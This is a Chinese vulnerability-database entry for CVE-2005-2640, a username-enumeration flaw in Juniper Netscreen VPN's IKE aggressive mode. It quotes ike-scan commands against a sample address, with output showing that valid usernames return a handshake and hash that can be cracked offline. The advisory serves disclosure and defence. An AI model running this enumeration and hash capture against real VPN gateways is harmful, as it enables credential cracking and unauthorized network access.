Juniper Netscreen VPN用户名枚举漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109012 漏洞类型 设计错误
发布时间 2005-08-18 更新时间 2007-02-19
CVE编号 CVE-2005-2640 CNNVD-ID CNNVD-200508-259
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/26168
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-259
|漏洞详情
Netscreen是Juniper提供一系列领先的联网和安全产品之一。JuniperNetscreen集成的防火墙/VPN产品在为客户执行执行VPN安全测试时存在VPN用户名枚举漏洞,成功利用这个漏洞的攻击者可以访问VPN保护的网络资源。攻击者可以使用字典攻击判断Netscreen上有效的VPN用户名。一旦发现了用户名,攻击者就可以使用这个用户名从Netscreen获得哈希,然后离线破解判断相关的口令。
|漏洞EXP
source: http://www.securityfocus.com/bid/14595/info

The Juniper Netscreen VPN implementation will identify valid usernames in IKE aggressive mode, when pre-shared key authentication is used. This allows for attackers to obtain a list of valid VPN users. With a valid username, an attacker can obtain hashed credentials against which a brute force attack may be performed. A successful crack would mean that the attacker has complete access to the network. 

The ike-scan options used in this example are:

-A Specify IKE Aggressive Mode. The default for ike-scan is
Main Mode.

-M Multiline: Display each payload on a separate line, which
makes the output easier to read.

--id=string Specify the string to be used for the ID payload.

10.0.0.1 The IP address of the target Netscreen.

3.1. Response to valid username "royhills@hotmail.com"

$ ike-scan -A -M --id=royhills@hotmail.com 10.0.0.1
Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
10.0.0.1 Aggressive Mode Handshake returned
HDR=(CKY-R=21af4dbe2cecd5f0)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds
LifeDuration=28800)
VID=64405f46f03b7660a23be116a1975058e69e83870000000400000403
(Netscreen-05)
VID=4865617274426561745f4e6f74696679386b0100 (Heartbeat Notify)
KeyExchange(128 bytes)
Nonce(20 bytes)
ID(Type=ID_IPV4_ADDR, Value=10.0.0.1)
Hash(20 bytes)

Ending ike-scan 1.7.7: 1 hosts scanned in 0.136 seconds (7.37 hosts/sec). 1
returned handshake; 0 returned notify

3.2. Response to invalid username "invalid@hotmail.com"

$ ike-scan -A -M --id=invalid@hotmail.com 10.0.0.1
Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)

Ending ike-scan 1.7.7: 1 hosts scanned in 2.467 seconds (0.41 hosts/sec). 0
returned handshake; 0 returned notify
|参考资料

来源:BID
名称:14595
链接:http://www.securityfocus.com/bid/14595
来源:MISC
链接:http://www.nta-monitor.com/news/vpn-flaws/juniper/netscreen/index.htm
来源:SECTRACK
名称:1014728
链接:http://securitytracker.com/id?1014728
来源:SECUNIA
名称:16474
链接:http://secunia.com/advisories/16474/
来源:BUGTRAQ
名称:20050818JuniperNetscreenVPNUsernameEnumerationVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112438068426034&w=2